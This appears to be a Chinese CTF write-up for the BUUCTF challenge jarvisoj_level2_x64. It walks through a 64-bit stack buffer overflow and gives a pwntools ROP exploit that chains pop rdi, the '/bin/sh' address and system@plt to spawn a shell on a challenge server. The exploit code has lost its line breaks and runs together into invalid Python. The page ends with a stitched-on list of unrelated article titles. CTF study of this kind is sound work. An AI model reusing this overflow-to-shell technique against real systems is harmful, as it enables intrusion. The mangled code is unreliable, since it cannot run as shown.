1.例行检查保护机制

只开启了堆保护

2.我们用64位的IDA查看该文件

shift+f12查看关键字符串,我们看到关键字符串“/bin/sh”

我们双击“/bin/sh”,bin/sh的地址为:0x0600A90

3.查看main函数里面的内容

进入vulnerable_function()函数

我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出

4.system("/bin/sh")才能拿到权限

我们找到了“/bin/sh”

所以我们现在来找system

双击_system

我们发现system在plt里面,system地址为:0x04004C0

5.EXP

#encoding = utf-8
from pwn import * context(os = 'linux', arch = 'amd64',log_level = 'debug')
content = 0def main():if content == 1:p = process('level2_x64')else:p = remote('node4.buuoj.cn',25149)#.data:0000000000600A90 hint            db '/bin/sh',0bin_addr     = 0x0600A90#.plt:00000000004004C0 _system system_addr  = 0x04004C0#0x00000000004006b3 : pop rdi ; retpop_rdi_addr = 0x04006b3payload = b'a' * (0x80+0x8) + p64(pop_rdi_addr) + p64(bin_addr) + p64(system_addr)p.recvuntil("Input:")p.sendline(payload)p.interactive()
main()

buuctf|pwn-jarvisoj_level2_x64-wp相关推荐

  1. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  2. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  3. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  4. TAMU ctf pwn部分wp+赛后

    TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga...... Tr*vial 大水题,栈溢出,ret2text exp from pwn import *context(arc ...

  5. [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp

    [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp 文章目录 [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglemen ...

  6. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  7. buuctf pwn wp(第四波)格式化字符串漏洞系列

    这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...

  8. BUUCTF pwn wp 76 - 80

    cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...

  9. [BUUCTF]PWN——pwnable_orw

    pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的 ...

  10. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

最新文章

  1. 艾伟:WCF从理论到实践(11)-异步
  2. 六十二、数据结构栈和队列的相互实现
  3. .NET工资低?那肯定是你打开的方式不正确
  4. 简明Python教程学习笔记_1_基本
  5. 初级软考程序员不会c语言,软考程序员初级通过率是多少_软考程序员初级多少分过_上学吧...
  6. httpclient下载图片或者其他文件
  7. 【游戏开发实战】教你使用Unity实现录屏生成GIF的功能,录个妹子跳舞的GIF吧
  8. 单树莓派/双树莓派+USRP+srsLTE分布式搭建4G LTE微基站
  9. 阿里云Aliplayer视频播放2(断点续播--根据上次播放记录实现续播功能)
  10. Java项目如何统一日志框架?
  11. 复盘:智能座舱系列文五- 它的3种交互方式之隐式交互
  12. 中型仓储货架是使用三立柱货架好,还是使用两立柱货架好?
  13. 校招前端笔试面试回顾
  14. 详细设计说明书的书写格式
  15. Rust之包,箱和模块管理(四):用use关键字引用其他包
  16. Magic Leap开发指南(9)-- 6 DOF(Unity)
  17. 错误: 找不到或无法加载主类 com.xxxx.xxx.Application
  18. Mac版Fork使用(git可视化客户端)
  19. 网易、华为、美团java工程师社招面经!
  20. 南邮 OJ 1157 C - 红宝书

热门文章

  1. 关于佛教出家人衣食住行的问答交流贴5(转贴)
  2. ion android 内核,Android Ion用户空间和内核空间
  3. Xshell使用和基本命令
  4. ucore操作系统 lab1 练习一 实验报告
  5. 入门级excel 考题_入门级的Excel书籍
  6. python初始化二维矩阵
  7. win 10.0.17134.915 版本无法更新处理方法
  8. 很不错的一款软件--护眼精灵
  9. 简单的ffmpeg推流(C++实现)
  10. 计算机主板的几种高速率接口了解